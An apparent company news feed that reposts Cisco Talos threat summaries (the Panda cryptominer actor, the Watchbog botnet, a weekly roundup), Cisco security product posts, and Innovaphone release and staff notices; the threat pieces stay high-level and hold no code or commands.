Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”

By Talos Group By Christopher Evans and David Liebenberg.
Executive summary
A new threat actor named “Panda” has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we’ve ever seen, but it still has been one of the most active attackers we’ve seen in Cisco Talos threat trap data. Panda’s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.
Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.
Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread “MassMiner” campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns.
Read More >>

Source:: Cisco Security Notice

/von

Support:Innovaphone Fax 100266 (sr59) available

Source:: Innovaphone

/von

Support:Innovaphone Reporting 100266 (sr59) available

Source:: Innovaphone

/von

Support:Linux Application Platform 100266 (sr59) available

Source:: Innovaphone

/von

Efrem Lemonis verstärkt unser Technik-Team

Kaum bei uns angekommen und schon den ersten Zertifizierungslehrgang erfolgreich bestanden. So kann man starten, oder?Glückwunsch zum Bestehen des innovaphone Technician Connect.

Zur Freude der Kollegen spielt Efrem an der Konsole im Team X-BOX. In der Freizeit testet er gerne gemeinsam mit seiner Freundin die unterschiedlichsten Restaurants und hält sich auch privat in Sachen PC-Systeme auf dem aktuellsten Stand.

Schön, dass Du an Bord bis, Efrem.

/von

Threat Roundup for September 6 to September 13

By Talos Group
Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sep. 6. to Sep 13. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
Read More
Reference:
TRU09132019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

Source:: Cisco Security Notice

/von

New Threat Grid App for IBM QRadar SIEM

By Jessica Bair Download the app for faster, more effective threat detection and response
Two years ago, Cisco and IBM Security announced a strategic alliance to address the growing threat of cybercrime. This collaboration builds on each organization’s strengths and complementary offerings to provide integrated solutions, managed services and shared threat intelligence to drive more effective security for our joint customers. We continue to develop new applications for IBM’s QRadar security analytics platform and the Cisco Threat Grid app for QRadar with DSM was just released.
Cisco’s Threat Grid App integrates with IBM’s QRadar SIEM, enabling analysts to quickly identify, understand and respond to system threats rapidly through the QRadar dashboard. Downloadable via the IBM Security App Exchange, this powerful app combines advanced sandboxing, malware analysis and threat intelligence in one unified solution.
Threat Grid + QRadar enables analysts to quickly determine the behavior of possible malicious files, which have been submitted to Threat Grid, and rapidly drill down from QRadar into the Threat Grid unified malware analysis and threat intelligence platform, for deeper insight. This integration expedites the threat investigation process, with a dashboard view into the highest priority threats, delivered directly through QRadar versus having to pivot on disparate tools and interfaces.
Detailed results from the sandbox analysis of Threat Grid can be aggregated by QRadar to determine whether the potential threats within the organization are malicious or benign. Malware samples are then assigned a Threat Score, and displayed by hash value and the user which submitted the sample.

This information displayed on the Threat Grid dashboard can be used to quickly resolve threats detected by QRadar. This results in improved efficiency and optimization for security analysts, by quickly identifying the top priorities for threat investigation.
With the QRadar DSM capabilities, you can see the analysis results over time.

Also, under Log Activity, for suspicious IP addresses, you can use the right-click to see instant contextual threat intelligence from Threat Grid.

Threat Grid also integrates with IBM Resilient Incident Response Platform (IRP) for automated response and X-Force Exchange for even greater threat intelligence enrichment. For example, analysts in the IRP can look up Indicators of Compromise (IoC) with Cisco Threat Grid’s threat intelligence, or detonate suspected malware with its sandbox technology. This empowers security teams to gain valuable incident data in the moment of response.
These technology integrations between Cisco Security and IBM Security enables a more extensive security architecture for greater speed and efficiency in identifying, investigating, and remediating threats. Together, we deliver the intelligence, automation and analytics required to provide data and insights that today’s security practitioners require.
Please visit the Cisco and IBM page for the latest information about our partnership, and the Cisco Marketplace for details of the IBM integrations.

Note: Version 1.0.0 of the app has a coding error that limits its compatibility to the Threat Grid US Cloud. A fix for support of the Threat Grid European cloud and appliance are in validation testing with IBM.

Source:: Cisco Security Notice

/von

Watchbog and the Importance of Patching

By Talos Group By Luke DuCharme and Paul Lee.
What Happened?
Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.
This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker’s intentions and abilities on a customer’s network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts.
There were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover – this attacker did not practice particularly strong operational security.
The attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any “real” hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the “positive” intentions of this adversary. Below is a message left on a compromised system by the adversary:
at Talosintelligence.com

Source:: Cisco Security Notice

/von

Ingredients Needed to Manage Network Tribbles

By Amanda Rogerson Cybersecurity – the final frontier, these are the trials and tribulations that network admins face on an ongoing basis. Sometimes it feels like network admins are Starfleet captains navigating unknown galaxies as the infrastructure of organizations become more complex. Using a complicated mix of cloud apps, on-prem systems, BYOD, IoT, and more, gone are the days of purely corporate-owned assets.
This means that it is more challenging to trust all the devices on your network anymore. Let’s face it, the perimeter has shifted and users and devices have become the primary entry points for accessing the network and business applications, and more often than not they rely on weak legacy password-based access controls. There must be a better way to boldly go where every admin has gone before to control both application and network access across your campus, Data Center, and cloud!
On today’s modern networks, administrators require solutions that provide deep visibility into users, devices, and the applications both on and off the corporate network.
There is no need to set your phasers to stun for non-compliant users or devices, a “zero trust for the workforce” security model answers these challenges by treating every access attempt as if it were an invading alien species coming from an unknown galaxy, or in this case and untrusted network.
This model focuses on authenticating users and checking the security posture of devices before granting access to applications. By combining the power of Duo Security with Cisco Identity Services Engine (ISE), you have a recipe for successfully implementing modern access controls which are simple yet astonishingly effective to address some core use cases around these challenges, and more appetizing than a Klingon’s Rokeg Blood Pie.
A Recipe to Simplify Visibility and Device Compliance
Decentralization of device management can leave administrators wondering how users are accessing resources. Determining the posture of devices connecting to resources is critical because outdated software often has vulnerabilities that are routinely exploited. Without current endpoint security protections, people can unwittingly turn their devices into a menace on the network, worse than a Tribble invasion. Two simple ingredients provide a delicious approach for strong access controls that is easy to replicate anywhere in the environment.
Cisco Identity Services Engine (ISE) makes it easy to gain visibility and control over who and what’s on your corporate network consistently across wireless, wired, and VPN connections. As users and devices connect to the network, ISE confirms identities against its own user repository and authenticates those users before it grants and controls access based on who and what requested network access. Duo Security compliments this visibility by providing device insights for any device connecting to applications, including devices that are not connected to the corporate environment.
With multi-factor authentication and adaptive access controls, Duo provides the ability to authenticate the user connecting to the resource and verify the access attempt. Through granular access policies at the application or group membership level, administrators can establish controls to grant or block access attempts by identity or device and based on contextual factors such as user location, network address ranges, biometrics, device security and more.
For devices connected to the corporate network ISE together with Cisco AnyConnect Secure Mobility Client checks the security posture of devices that connect to your network. Duo’s Trusted Endpoints augments these controls and lets you issue device certificates that are checked at login for greater insight into and control over your BYOD environment while limiting access by any personal devices that don’t meet your security requirements. With ISE and Duo, you’ll benefit from simplified, secure controls needed to grant appropriate access while protecting your organization from the risks of unauthorized people and devices.
Don’t let the Borg assimilate you into an outdated approach to security. Take the helm and join Duo and Cisco on September 24th to learn more recipes for how combining the power of Duo Security with Cisco ISE can help your organization adopt a zero-trust approach to modern, simple and effective secure access. Full speed ahead, live long and prosper.

Source:: Cisco Security Notice

/von